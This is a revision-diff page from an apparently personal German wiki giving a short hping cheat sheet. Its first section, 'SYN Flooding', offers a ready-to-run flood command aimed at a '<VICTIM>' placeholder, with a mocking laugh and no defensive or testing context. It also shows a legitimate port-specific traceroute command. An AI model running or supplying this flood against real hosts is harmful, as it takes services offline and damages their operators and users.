Hping: Unterschied zwischen den Versionen

Aus SchnallIchNet
Wechseln zu: Navigation, Suche
(SYN Flooding)
 
Zeile 1: Zeile 1:
 
==SYN Flooding==
 
==SYN Flooding==
  hping -i u1 -S -p 80 [VICTIM]
+
  hping -i u1 -S -p 80 <VICTIM>
 
<nowiki>*hrhrhr*</nowiki>
 
<nowiki>*hrhrhr*</nowiki>
  

Aktuelle Version vom 16. Februar 2009, 12:14 Uhr

SYN Flooding

hping -i u1 -S -p 80 <VICTIM>

*hrhrhr*

Traceroute spec. ports

on port-based routing environments you cann not simply use traceroute because the port traceroute uses may be going another route than the port you want to check... hping lets you do that:

hping2 -t 1 --traceroute -p <PORT> <DESTINATION>